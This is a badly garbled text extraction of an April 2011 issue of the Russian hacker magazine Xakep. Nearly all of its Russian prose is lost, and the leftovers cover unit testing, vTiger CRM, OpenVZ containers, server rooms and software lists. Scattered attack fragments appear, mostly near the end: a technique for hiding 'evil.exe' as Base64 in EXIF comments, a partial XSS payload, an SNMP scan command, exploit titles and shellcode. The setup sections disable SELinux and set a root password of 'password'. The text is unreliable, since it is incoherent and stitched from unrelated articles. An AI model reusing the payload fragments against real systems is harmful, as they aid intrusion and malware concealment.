TEST_F(QueueTest, DequeueWorks)
{
int* n = q0_.Dequeue();
EXPECT_EQ(NULL, n);
n = q1_.Dequeue();
ASSERT_TRUE(n != NULL);
EXPECT_EQ(1, *n);
EXPECT_EQ(0, q1_.size());
delete n;
...
}
, , RUN_ALL_TESTS(). Google Test , - . ,

, RUN_ALL_TESTS.
RUN_ALL_TESTS()
int main(int argc, char **argv)
{
::testing::InitGoogleTest(&argc, argv);
return RUN_ALL_TESTS();
}
// NULL,
E* Dequeue();
size_t size() const;
...
};
main,
.
gtest_main.
//
class QueueTest :
public ::testing::Test
{
protected:
virtual void SetUp()
{
- -. Boost Test, CxxTest, API Sanity Autotest

C/C++ Unix-
. . , , - Unit
Tests ,
. z
X 04 /147/ 2011
119
SYN/ACK
grinder (grinder@tux.in.ua)
CRM
, -,
, ,
CRM. , CRM , , , , .
.
CRM?
(CRM,
Customer Relationship Management System)
, (, ; , ;
). , , ,
(
, ).
, CRM ,
, , .
-,
,
.
. , ,
. , ,
,
.
, ,
, CRM-,
. , ,
, (, ).

. CRM , ,
, , , ,
,
VoIP, .
CRM , -
, .

. , CRM ,
(
),
.
120
. , , CRM
,
. ,

- ,
.
,
.
, CRM .
CRM :
, .
,
, .
,
. .
CRM
, ,
. , ,
.

CRM
, ,
, , , , ,
.
. ,
CRM . ,
, , .
, .
, ,
.
. , ,
, CRM
, IT.
X 04 /147/ 2011
vTiger CRM Ubuntu 10.04

vTiger CRM
.
.
bin-,
,
Apache MySQL.
( Y N)
.
Configuration Wizard.

. ,
Apache MySQL,

.
vTiger CRM URL.
(Configuration Wizard)
.
(Pre Installation Check).

PHP, php.ini,
,
,
, , (,
,
CRM).
-
,
.
, .
:
, ,
,
. , CRM, SFA (Sales Force Automation System Sales force
X 04 /147/ 2011
vTiger CRM.
Ubuntu ( /var/
www/vtigercrm):
$ sudo apt-get install php5-gd php5-imap
$ sudo chown www-data:www-data /var/www/
vtigercrm

MySQL, vTiger CRM
. .
. ,

Setting Module Manager Custom Modules
Import New.
install.php
install.
vTiger CRM ,
OpenSource .
,
bin-.
INFO
info

10% CRM
.
CRM
,

.
management systems). , ,
CRM , . SFA
.
CRM , 1, Excel . ,

CRM. -,
? , , .
,

CRM,
121
SYN/ACK
vTiger CRM

Configuration
Wizard
. , .
,
CRM .
CRM
vTiger CRM ,

. , , , .
, Outlook, (
CRM Outlook) . MS Word (
).
,
CMS .
,
, ,
.
, , ,
, ,
.
(
, )
.
, , (
) . , ,
- (
, ).
. ,
CRM,
122
CRM-
. ,
, .
CRM ,
, , .
, CRM
.
- .

.
CRM .
,
, .
, .
,
, .
, (
CRM), OpenSource
Linux/*BSD, MySQL.
CRM,
(SaaS). , NetSuite CRM (netsuite.com) (megaplan.ru,
SaaS ).
SaaS , ,
, .
. ,
, ,
. ,
, , .
vTiger CRM
, OpenSource CRM vTiger CRM (vtiger.com),

X 04 /147/ 2011
, SynAsk
, ,
,
.
,
:
, .
,
.
. .
/
-,
, , ,
,
,
1997
. ,
, .
, ,
: N ,
, A, B,
C!
: Excel,

, .
?
:
N ,
, ,
()
(
) - !. ,
- ,
.
. ,

.
(
) .
.
.
,
,
, .
,
,
() , ,
,
,
. ,
.
. ,

( Web Forms).
Customer Portal
. SFA , ,
, , (
MS Excel OO Calc ), , , .
( CRM
PDF), .
,
( 5.2.1).
,
. ,
, , ,
, .
.
, , ,
.

.
,
, vTiger CRM
,

.
, , ,
.
, , , .
:

.
.
SugarCRM (sugarcrm.com),
.
vTiger CRM , SugarCRM. ,
, , , ,
.
CRM,
- .
,
-.
X 04 /147/ 2011
vTiger CRM
123
SYN/ACK

(
SMTP/IMAP , GMail), , RSS-.
VoIP- Asterisk. Outlook, MS Word ( 2000/2003/2007), Thunderbird Firefox.
iPhone
Android. .
vTiger CRM
LAMP/WAMP,
-. .
Linux - (
bin), .
,
vTiger CRM, : CPU 1.8 512
RAM ( 2).
, ,
.
vTiger CRM .
, ,
. ,
, , ,
,
.
124
vTiger CRM
CRM ,
. , .
, ,
. z
X 04 /147/ 2011
SYN/ACK
(zobnin@gmail.com)
-

OpenVZ
,
. , ,
. , - ,
web-.
,
,
. : -,
,
, , , - .
,
,
, ,
,
.
, ,
.
, ,
,
.
GNU/Linux.
: ,
,
,
, , , ,

( ).
, , :
, , . ,
, ,
- , ,
, .

, ,
,
.

, , , ,
126
. ,
,
,
.
: ,
( 1%) .
:
.
OpenVZ?
UNIX .
FreeBSD.
Jail () ,
.
, Sun
Solaris 10, Solaris Zones,
, (,
Solaris Zones ).

Linux,
. -, Linux-VServer (
). -, , LXC (LinuX Containers),
, ,
Linux,
-
. -,
OpenVZ,
Virtuozzo,
Parallels.
OpenVZ Virtuozzo -
C Linux.
,
Linux. ,
OpenVZ ,

OpenVZ, ,
.
X 04 /147/ 2011
OpenVZ .

,
, ,
. ,
DNS- vzctl

/etc/resolv.conf .

.
OpenVZ?
, OpenVZ Linux,
,
VE (Virtual Environment
),
.

.
,
, Hardware Node ( ). -,
.
Linux-.

,
, , , ( )
,
.
OpenVZ
, , , .

, ,
X 04 /147/ 2011
OpenVZ-
vzlist
;
vzmigrate offline- online-;
vzcfgvalidate
;
vzmemcheck, vzcpucheck, vzcalc
;
vzsplit
;
vzpid PID
;
vzquota .
.
OpenVZ
(venet veth)
,
, ,
IP-,
. OpenVZ ,

. ,
.
, ,
(,
web- , 5 ).
OpenVZ .
,
- .
INFO
info

/var/lib/vz/private,
,

.

:
tar -C /var/lib/vz/
private/100 -czf /
var/lib/vz/template/
cache/debian-5.0custom-x86_64.tar.gz
127
SYN/ACK

,
, / .
OpenVZ
, (
).
, -, OpenVZ

.
,
, , (,
memcached ).
OpenVZ Web Panel OpenVZ

, , Linux, OpenVZ
, ( ,
). -, OpenVZ , . , ,
NFS, OpenVPN IPSec .
- , ,
( OpenVZ ).

. -, OpenVZ
, ,
,
. , ,
80-90%
. -, OpenVZ
, -
,
128

Virtuozzo, OpenVZ RHEL,
OpenVZ- .
OpenVZ Debian,
OpenVZ (
linux-openvz-i386 FIXME).
Ubuntu OpenVZ 8.10, OpenVZ :
Ubuntu 8.04. , , : -, OpenVZ- 2.6.18, Ubuntu
8.04 2.6.24; -,
Ubuntu 8.04 LTS-, ,

2013 , , , . ,
RHEL, OpenVZ .
openvz.org yum:
# cd /etc/yum.repos.d
# wget http://download.openvz.org/openvz.repo
# rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ
SELinux:
X 04 /147/ 2011

.
OpenVZ userspace-, :

OpenVZ
# echo 'SELINUX=disabled' > /etc/sysconfig/elinux
:
# yum install ovzkernel
# yum install vzctl vzquota
Debian ,
:
$ sudo apt-get install vzctl vzquota \
linux-openvz-i386
Ubuntu . Ubuntu 8.04, /

etc/apt/sources.list.d/hardy-main.list
:
# vi /etc/apt/sources.list.d/hardy-main.list
deb http://mirror.yandex.ru/ubuntu hardy main
deb http://mirror.yandex.ru/ubuntu
hardy-updates main
deb http://mirror.yandex.ru/ubuntu
hardy-security main
# /etc/init.d/vz start
,
OpenVZ ,
, , , .

OpenVZ, ,
( ).
:
1. ,
,

( ).
2. Linux
, , initramfs .
3. OpenVZ.
.
- :
$ cd /var/lib/vz/template/cache
wget:
OpenVZ-
:
$ sudo apt-get update
$ sudo apt-get install vzctl vzquota
linux-openvz
, OpenVZ
.
/etc/sysctl.conf :
# vi /etc/sysctl.conf
net.ipv4.conf.default.proxy_arp = 1
net.ipv4.ip_forward = 1
net.ipv4.conf.all.rp_filter = 1
kernel.sysrq = 1
net.ipv4.conf.default.send_redirects = 1
net.ipv4.conf.all.send_redirects = 0

X 04 /147/ 2011
$ sudo wget http://download.openvz.org

/template/precreated/debian-5.0-x86.tar.gz
, download.openvz.org/template/
precreated .
OpenVZ ,
vzctl. , , ,
, .
OpenVZ
. :
# vzctl _
,
OpenVZ, .
create,
set,
HTTP://WWW
links
,
UBC:
wiki.openvz.org/UBC;
:
http://goo.gl/h1gNL.
, :
http://goo.gl/lZbzW.

:
http://goo.gl/sYtxF;
I/O
:
http://goo.gl/YtjiV.
C
OpenVZ:
http://goo.gl/KfEbB.
OpenVZ Web Panel,

web-
OpenVZ:
http://goo.gl/x7UlF.
OpenVZ
Web Panel:
http://goo.gl/vx73u.

OpenVZ
Ubuntu 10.04

:
http://goo.gl/XEaou.
129
SYN/ACK
destroy. enter, start, stop restart, .

Vzctl ,
,
. :
1. 100 (,
IP-):
# vzctl create 100 --ostemplate debian-5.0-x86 \
--config vps.basic
debian-5.0-x86
tar.gz, vps.basic ,
.
2. , :
# vzctl set 100 --onboot yes --save
3. :
# vzctl set 100 --hostname my-first-vps.org.ru --save
OpenVZ
# vzctl set 100 --vmguarpages 256M:256M --save

# vzctl set 100 --privvmpages 512M:512M --save
10.
( , ):
# vzctl enter 100
man- vzctl.
UBC
OpenVZ User
Beancounters (UBC). 20 UBC, . UBC
vzctl, /proc/user_
beancounters, . ,
, :
4. IP-:
# vzctl set 100 --ipdel all --ipadd 192.168.0.100 --save
5. DNS-:
# vzctl set 100 --nameserver 192.168.0.1 --save
6. root:
# vzctl set 100 --userpasswd root:password --save
7. 15% (
100%, 200%, 400% ):
# vzctl set 100 --cpulimit 15 --save
8. 20 25 :
# vzctl set 100 --diskspace 20G:25G --save
9. ( , , ,
):
130
/proc/user_beancounters
uid ;
resource ;
held ;
maxheld
;
barrier ,
;
limit ,
;
failcnt , ,
.
OpenVZ, . failcnt ,
,
,
.
, ,
, . z
X 04 /147/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
SYN/ACK
(dhsilabs@mail.ru, dkws.org.ua)

, , .
, ,
/
(, , ,
][ , :) . .). ,
, , ,
. ,
, , . ,
, (
). , . ,
.
.
.
, . ()
, , ,
( ,
); ,
. , .
.
, .
, ,
, ,
. , .

.
, .
, , , .
. , ,
,
.
- . ,
, . , .

. , . :
,
( ),
132
, , .
( ).
:
, , . (, ),
(, ).
,
( , ).
. (Automatic Call Distribution),
(Key Telephone System), .
. ,
,
(
).
( )
TIA-569, .
1. . ,
34.
. .
.
, , .
2.
12 , 4.4 .
3.
. . ,
, .
4. . , .
5. 12 . , .
. 12 .
, .
().
6. 2.44 .
7.
18-24 30-55%.

. , , , .
:
X 04 /147/ 2011

TIA-569: dkws.org.ua/files/tia-569.doc;

(
): rackpro.ru;
: ./article04.html;
: axis.com/ru/products/index.htm;
EER: en.wikipedia.org/wiki/Energy_efficiency_ratio;
: dkws.org.ua/
phpbb2/topic4970.html.
, .
TIA-569 :
1. .
2.
(
, ) 3.
3. .
4. : 2 000 ,
910 . ( ),
.
5. 540 1
.
6. .
7. .
,
, :
1. ( )
500 . 3.0 2.2 , 800 .
3.0 2.8 , 1 000 . 3.0 3.4 .
1 000 . ,
.
2.
.
3.
.
X 04 /147/ 2011
, (
) . . ,
, ,
, .
,
. 19 ( 482,6 )
, 10 23 .

600, 800 900 , .
( Rackmount). ,
17,75 (450,85 ), (Unit, ).
.
MiniTower (, ) , .
, ?
, (
).
1.75 (444,5 ),
. , ,
, ,
42U .
42 1U. , 1U 444 , 437

.
. ,
, ,
. ,
-. (, ), . ,
. 1
133
SYN/ACK
. 3. . $120
. 1.
. 2.

-: ,
.
, .
2 .
, : ,
,
.
. ,
. 20U, ,
, 600 900 $270 $400 . ,
. 12U
( , ) $230. $19 ( 1 ) $120
. 6U $130.
( ) 22U
$900, $1500.
,
. 1500 550
1600 $5000.
, , .
, ,
,
, .
( ).
, . ,
.
,
, ,
,
, . ,
, . ,

,
134
.4. APC Smart-UPS RT 5000VA,

( , ). . ( ,
)
( ), .
.
, . 5-6 (
,
).
, . , 1 ,
APC Smart-UPS RT 1000VA.

( compress.ru). , ,
(Mustek PowerMust 1000), ,
, -
, 2
$300 (
).
$300,
$400. , , APC SmartUPS RT 5000VA .
$2500. ? , . .
. , , ,
X 04 /147/ 2011
. 6.
, Mustek PowerMust
1000 offline

(Line-Interactive UPS)
- (Off-Line UPS).
,

. 5. APC Smart-UPS - . , RT 5000VA,

,
(On-Line UPS, , APC Smart-UPS RT
5000VA).
? , , .
, . , - ,
, .
, ,
: ./article04.html.
20
. , ,
, .
.
, .
. ,
, .
(
), BTU (British thermal unit). 1 3.412
/. , , 400 .
:
10 x 400 x 3.412 = 13 648 /
.
100 , :
5 x 100 x 3.412 = 1 706 /
300 /. , 600-900 /.
, . ,
X 04 /147/ 2011
, ,
. , ,
.
.
,
(
EER), : en.wikipedia.org/wiki/
Energy_efficiency_ratio.
,
-,
, , .

, , (
,
).
30-55% ( 40-50%). , . ,
,
. ( ).
, (
2 000 ). , . ,
.
, .
:
.
, ,
.
, . ,
.
. ,
,
. Axis: axis.com/ru/products
( ,
).
? ,
AVTech KPD-670Z, (
), 1
.
.

, .

. ( ), , .

, (
,
, , ).
, . TIA (
), . z
135
UNITS
Oriyana (oriyana@xpsycho.ru)
PSYCHO:

. - .

? ,
. - , ,
, :
?
,
, -
, . ,
. Wikipedia,
, .
, .,
,
, .
, ,
, , , ,
- . ,

, . ,
, , ,
, ,
.
? ?

,

X-Files.
, XXI , , ,
. -
. , , ,
. ,
,
. , ,
136
.
,
, -, .
,
, . ( , )
, , ,
. ( , )
(?!).
, - ,
?, - .
, - ,
, , . ,
, .
. , ,
, , ?
, , ,
, , , . ,
- , ,
,
.
,
X 04 /147/ 2011
!
- . ,
,
. !
:
,
, . , ( ).

,
. , , , . , ,
,
. , , ,
, .
,
, , . , , ,
,
X 04 /147/ 2011

.
, , ,
, - , . ,
? ,
, ,
, ,
, .
.
, , ?
, , , ,
.
, - (
), - ( , ,
, , ).
,
,
137
UNITS
.
, .
>
, , ,
,
. poltern
, Geist . (
)
.
, , .
: , ( ,
, ) , ,
, ,
- .
, ,
. ,
- .
, , , , .
( )
-
(
) (
).
(, ,
, ) , . ,
( , ) , , ,
. - ,
, - , -,
,
(
, ?).
, ,

- , (,
).
: - - , -
- .
,
-, .
> ()

, - . ,
-
: , ,
,
, .
, , . ,
.
138
,
, ,
. , ,
,
. ,
.
:
240
( ),
, (
).
, ,
. -
, - . , - - , ][
:) : http://bit.
ly/telekinez.
>
, ,
, -
, - ,
. ,
, ,
. - , 1927
. Michigan Medical , ,
, ,
,
. - : ( ,
, ), ,
.
, , ,
, , . ,
, - ,

: () ,
, . ,
, . : - .
, , , , - .
, , ,

. - ,
,
. , ,
, . , ,
. ,
X 04 /147/ 2011

, : ,

,
. , ,
, -
.
>
(extra , sensus ).
: ( ), ( , ,
), (
). .
,
, , , .
,
. ( - !), , : - , - , - . ,
( , - , ),
(
) ,
, , ,
. , , X 04 /147/ 2011
(
)
,
. . , -, ,
, ,
, (
?) .
, ,
- ( , !) , , -, , , ! ? , , ?
- ,
, . , ! ?
. ,
, , , , , ,
!.

- , . ,

.
P.S.
,
-, - , . z
139
UNITS
Step (twitter.com/stepah), Ant
faq
united?

faq@real.xakep.ru
Q: ,
PHP.
.
. ,
,
.
.
?
A: ,
, . ,
, ++.
,
PHP.
. ,
Facebook
HipHop for PHP (github.com/
facebook/hiphop-php), PHP C++
g++ .

PHP, HipHop
.
( PHP ),
,

140
eval(). Facebook CPU 50% (

Apache PHP
).
2010 .
:
C/C++,
.
,
, . HipHop ,

git:
git clone git://github.com/facebook/
hiphop-php.git
PHP
5.2 ( 5.3)
Linux.
Q:
, Amazon
Web Services ,

.
.
,
Amazon -
API,
,
?
A: , API
Amazon . , .
S3,
, REST API. EC2,
, Query API
EC2. ,
,
API.
,

. ,
API
Amazon.
Boto
(code.google.com/p/boto).
2.0beta4,
AWS (Amazon Web Services),

DNS- Route53
Amazon
Simple Email Service. ,

,
X 04 /147/ 2011

:
ndiswrapper -i driver.inf
, :
ndiswrapper l
driver present, hardware

present , .
Ndiswrapper:
modprobe Ndiswrapper
,
wlan0, iwconfig/wpa_supplicant
. .
ARP-
ARPFreezerNG
,
. boto.cloudhackers.
com
.
Q:
(Windows Event Log) ?
A:
,
Memoryze
(mandiant.com/products/free_software/
memoryze) Volatility (volatilesystems.com/
default/volatility).
. Memoryze
:
1. Auditviewer
. , .
Process
Enumeration Memory sections.
2. ,
services.exe,
Memory Sections.
, .
3.
services.exe Acquire Process. ,
,
__SystemMemory%5c0x###
#####-########.VAD.
Windows, .
4.

Event Log Explorer (eventlogxp.com) Perl- evtViewer (sourceforge.
net/projects/evtviewer).
.evt.
X 04 /147/ 2011
Q: Linux. ,
.
: Linux
. , -
?
A: , -

, -
,
.

: Windows!
-, ,
. ?
Ndiswrapper (ndiswrapper.
sourceforge.net). ,
API- Windows (
) API NDIS (Network
Driver Interface Specification) Linux.
,
Linux ,
, - . Ndiswrapper
, PCMCIA USB
.
, lspci nn (
PCI-) lsusb ( USB-),

, .
, .
,
32- Windows XP. , .zip, .cab .exe,

( *.inf, *.sys, *.bin).

Q: ,
MacBook (, ,
) .
Linux?
A: ,
Linux 2.6.30
multitouch. , , ,
.
TouchEgg (code.google.com/p/touchegg),

.
, uTouch evdev.
- ,
/usr/share/touchegg.conf.
: , , .
, ,
.
touchegg.conf :
#FOUR FINGERS DRAG
[FOUR_FINGERS_DRAG_UP]
action=CHANGE_DESKTOP
settings=DIRECTION=LEFT
. .
Q: (Windows 7)?
A: , -

.
, ,
,
Autologon (technet.microsoft.com/en-us/
sysinternals/bb963905) -
141
UNITS

.
- .
A: , ,
VirtualKd
. GUI-
, ,
.
,
:
autologon.exe user domain password.
Q:
, : WinDBG
!
?
A: -
COM-,
.
115200
( 10 /),
, . ?
, COM-
.
VirtualKd (virtualkd.sysprogs.org),
Windows
VMware VirtualBox.
WinDBG/KD
COM- (named pipe):
450 /
VirtualBox 150 / VMWare.

Windows ,
(WinDBG/
KD),
.
,

snapshot,
.
:
.
142
GUI-.

. , VirtualKd Windbg debugger
IDA Pro : hexblog.com/?p=123.
Q: ARP
Poison ?
A: ARP Poison -

( ).
,
ARP-spoofing (xakep.ru/
magazine/xa/068/060/2.asp).
.
.
IDS Snort,
DecaffeinatID (irongeek.com/
downloads/decaffeinatid0.08.zip),

ARP-. , ,
MAC- ,
.

Windows .
,
ARPFreeze (irongeek.com/downloads/
arpfreezeng.zip),
GUI-
ARP-,
Cain & Abel,
Ettercap, Arpspoof ,
MITM-.

( arp netsh),
ARPFreeze ARP- .
Q:
,
,
, , .
. -
, Peach (peachfuzzer.
com). ,
,
:

XML-.
,
. ,
, ,
GUI-,
.
. ,
, Peach.

(, Python)
(Scapy, secdev.org/
projects/scapy),
.
? ,
, ,
(xakep.ru/
magazine/xa/126/028/1.asp).
Q:
ATA,
! ,
. ?
A: , - -

, .

. ,
.
HDD.
MHDD (ihdd.ru/
mhdd), .
BIOS,

,
SATA- PATA-
. ,
HEX-
,
-. ( )
:
bit.ly/pass_hdd_retrive. z
X 04 /147/ 2011
>Multimedia
AmoK Exif Sorter 2.56
Chasys Draw IES
Divine Free Edition 0.5.0
InstantMask 1.4
ISO Workshop 1.0
Juice 2.2
MusicBrainz Picard 0.13
PhotoDoc 1.0.5
SMRecorder 1.2
>Misc
Akira 1.0
App Hide for Windows
AutoHotkey 1.0.48.05
AutoIt 3.3.6.1
BoxCryptor 0.1.0alpha
Cache My Work 1.2
Ceedo Personal
Client for Google Translate
Growl for Windows 2.0.6
Horodruin 3.0.260.0
Jump List Software for Windows 7
KeyCounter
MacSwitch 1.1.1
MojoPac 2.0 Free
Nemo Documents
NoDrives Manager 1.2.0
RED 2.2
RidNacs 2.0.3
StrokeIt .9.7
Synergy 1.4.2 beta
TaskUnifier 0.7.4
VirtuaWin 4.3
>Games
Soldat 1.5
Ruby:
Aptana RadRails 2.0.5
Arcadia 0.9.3
IronRuby 1.1.1
JRuby 1.6.0.RC2
Ruby 1.9.2
RubyGems 1.6.1
SlickEdit
TurboRuby 1.2
>>WINDOWS
>Development
Access To MySQL 3.0.0
Codex
Crack.NET 1.2
DreamCoder for MySQL Freeware 5.3
DreamCoder for Oracle Freeware 5.1
DreamCoder for PostgreSQL
Freeware 2.5
Extreme Editor
Geany 2.0
Mono 2.10
Scapy
SharpDevelop 4.0
SmartAssembly 6.0
TortoiseHG 2.0
WebStorm 2.0
>>UNIX
>Desktop
Ardour 2.8.11
Decibel 1.06
emelFM2 0.7.5
Exaile 0.3.2.1
File Roller 2.24.3
Fluxbox 1.3
Gmusicbrowser 1.0.2
>Net
3CX Phone System 9.0
Comodo EasyVPN
Deluge 1.3.1
Nemesis 1.4
Orbit downloader 4.0.0.7
Probe Web Server 1.0
SRWare Iron 9.0.6
TeamViewer 6.0
Torrent2exe
WinSCP 4.3.2
XAMPP 1.7.4
>Security
Attack Surface Analyzer BETA
BinScope Binary Analyzer
Cuckoo 0.1.0 beta
El Jefe 1.1
knock 1.4.4b
malpdfobj
Maltego 3.0.3
Mobius Forensic Toolkit 0.5.6.1
nmap 5.51
ostinato 0.3
PRAEDA
Process Hacker 2.11
R-U-Dead-Yet 2.0
safeseh-dump
WebScarab NG 0.2.1
Wireshark 1.5.0
>System
AppRemover 2.2.11.1
Boot-US 2.1.8
BufferZone Pro
Buster Sandbox Analyzer 1.26
Crucial System Scanner
CrystalDiskInfo 4 Dev5
Dokan SSHFS 0.6.0
Driver Magician Lite 3.5
Process Tamer 2.11.01
SlimDrivers 2.0.4
TeraCopy 2.1
Unknown Device Identifier 7.00
VirusTotal Uploader
SPlayer 3.6
Sublight 2.6.3
Verbum alpha
VirtualDub 1.9.11
Webcam Simulator 5.3
Webinaria
WinX DVD Author
WizMouse 1.6.0.0
. 1.1
>Security
Adsuck 2.1
Aidsql
Angry IP Scanner 3.0
Arachni 0.2.2.1
ASSP 1.8.5.5
DirBuster 0.12
getTorExitNode
HTTPForge 11.02.01
JBoss Autopwn
>Net
Balsa 2.4.9
Blam 1.8.7
ClipGrab 3.1.0.1
Dillo 2.2
Google Chrome 9.0.597.98
gPodder 2.13
JMule 0.5.8
Mozilla Firefox 3.6.13
Mumble 1.2.3
NetHogs 0.7.0
Opera 11.01
Rss-Aware 2.03
Steadyflow 0.1.5
Sylpheed 3.1.0
Turpial 1.3.4
TorrentVolve 1.4
TweetDeck
Yarssr 0.2.2
>Games
Trigger Rally 0.5.2.1
>Devel
Anjuta IDE 2.30.1.0
Boost 1.46.0
GTK+ 3.0
Jdk 6 update 24
Libmcrypt 2.5.7
Mono 2.10
Musl 0.5.0
Nasm 2.09.05
Pudb 0.93.1
Python 3.2
Racket 5.1
SciTE 2.24
Tora 2.1.3
UMLet 11.0
Wing IDE 4.0
wxPython 2.9.1.1
XAMPP 1.7.4
Zimbra 7.0
GnomeBaker 0.6.4
keyTouch 2.4.1
Kino 1.3.4
Leafpad 0.8.18.1
Macbuntu 10.10
Mirage 0.9.5.2
Mixxx 1.9.0
QtiPlot 0.9.8.4
Tellico 2.3.2
Terminator 0.95
Wink 1.5
>>MAC
1Password 3.5.7
Ambientweet 1.0
ArtRage 2.6
atMonitor 2.1.5
Billings Pro 1.0.1
Boom 1.0
Burn 2.5.1
Camouflage 1.25
Cornerstone 2.0
IceClean 3.46
MacTubes 3.0.3
Permute 1.0
Right Zoom 1.7
Speed Download 5.2.22
Ted 0.9715
Trillian 1.1.0.1
TupeIt4Me 4.2.1
Ukelele 2.1.4
UnPlugged 1.8
Watts 4.14.1
>System
Bash 4.2
Burg
Coreutils 8.10
Fedoraplus 1.0
gctWiMAX 0.0.1d
GKrellM 2.3.5
Linux Kernel 2.6.37.2
MountManager 0.2.6
Ndiswrapper 1.56
Network UPS Tools 2.6.0
nVidia 260.19.36
Touchegg 0.1
Wine 1.3.14
Winetricks
xf86-video-ati 6.14.0
XSane 0.998
>X-Distr
SANS SIFT Workstation 2.0
FreeBSD 8.2
Mallory
Mcrypt 2.6.8
Mpctp 1.7
Rootkit Hunter 1.3.8
SambaScan2 0.5.0
Samhain 2.8.2
Scapy 2.2.0
XSSer 1.5
yInjector
knock 1.4.4b
malpdfobj
Maltego 3.0.3
Marvin v0.9
Mausezahn 0.40
Mobius Forensic Toolkit 0.5.6.1
Netbios Shares Scanner 0.3
Nmap 5.51
ostinato 0.3
PRAEDA
WebScarab NG 0.2.1
Wireshark 1.5.0
04(147) 2011

: 2
10
.
. 64
. 60

CISCO
BLACK HAT
AMAZON KINDLE
FACEBOOK
TJAT.COM
-
GEOHOT VS SONY
GO
. 110
NATIVE API
04 (147) 2011
DNS-: . 54
UNITS
HTTP://WWW2
VPN-

ANONYMOUSCOAT
anonymous.co.at
QUICKDIFF
quickdiff.com
, - VPN-,
IP-
. ,
, ,
. OpenVPN,
, .
( ). ,
512 /c,
80- 443-. :
.

.
, .
, ,
,
. ,
, Quickdiff. .
: , ,
( ),
.
OCR
ONLINE
ocronline.com
AVIARY
aviary.com
,

ABBYY FineReader. . -,
, -,
. -
OCR Online. , .
! , , :
,
.

. - AudioExprert.
, , .
, ,
. -, AudioExprert ,
,
, . , ,
.
144
X 04 /147/ 2011

Хакер 2011 04 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2011 04 PDF

Загружено:

Авторское право:

Доступные форматы

x 04 (147) 2011

4 200 70 , 340 000

Symantec, McAfee Trend Micro

.: (495) 935-7034, : (495) 545-0906

Arbor Networks , 2010

30 USB- 3G 4G, Jingle Yota.

Acer Aspire AZ3751

: 23", 1920 x 1080

Sony VAIO VPCL13M1R

Sony VAIO VPCL13M1R

Lenovo IdeaCentre A700

Lenovo IdeaCentre A700

0 1000 2000 3000 4000 5000 6000 7000 8000

Sony VAIO VPCL13M1R

Sony VAIO VPCL13M1R

Lenovo IdeaCentre A700

Lenovo IdeaCentre A700

Sony VAIO VPCL13M1R

Sony VAIO VPCL13M1R

Lenovo IdeaCentre A700

Lenovo IdeaCentre A700

0 1000 2000 3000 4000 5000 6000 7000 8000

handler and a .NET framework utility);

. Kindle e-mail user@free.kindle.com.

4. Remember verification for this computer for 30 days

20 000 000 000 4- .

HipHop PHP C++.

, memcached -. Facebook MySQL,

Activity Stream Inbox

exiftools exif. exif . . evil.exe Base64.

evil.exe Base64 Comment

uuencode m evil.exe evil.exe > evil.txt

4. XSS- MHTML + file://uncpath +

<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b760080c744f389><param name=url value=http://www.80vul.

BUDDYPRESS >=1.2 ACTIVITY GET_

E107 <= 0.7.24 REMOTE PHP CODE

, java , , Apache Tomcat.

Work;148171833;HarelEfraim;;+972 54 3054450 SMS;Thu

, WAP ICQ- tjat.com - , ,

HWND hWnd = GetConsoleWindow();

. 1 SNMP Community Scanner

nmap -sU -n -P0 -v -p 161 --script=snmp-sys.nse -iL my_

-sU , SNMP UDP ,

Metasploit Express Metasploit Pro Cisco

SNMP Community Scanner readwrite (c. .1).

The Universal Serial Bus (USB) - ,

iPhone, BlackBerry, Android ..

: Extra ICQ Password

, POP ESP; RET, ,

xor eax, eax

GeoHot ISEF 2007

, geekyschmidt.com: SVND crypto softraid,

# cat keyfile1 keyfile2 keyfile3 | geli init -K - /dev/da2

current- FreeBSD ISO- : ftp://ftp.freebsd.org/pub/FreeBSD/

FreeBSD 9.0 XTS

# geli attach -k ~/ad1.key /dev/ad1

swap , . .eli swap- /etc/fstab, . :

# bioctl -c C -r 65536 -l /dev/wd0d softraid0

2. strict sync yes,

, 90-! SWAT smb.conf

/etc/hosts.allow swat:127.0.0.1. xinetd:

SWAT (Samba Web Administration Tool) .

gnome-games-common aisleriot, gnomemahjongg, gnome-sudoku, gnomine, quadrapassel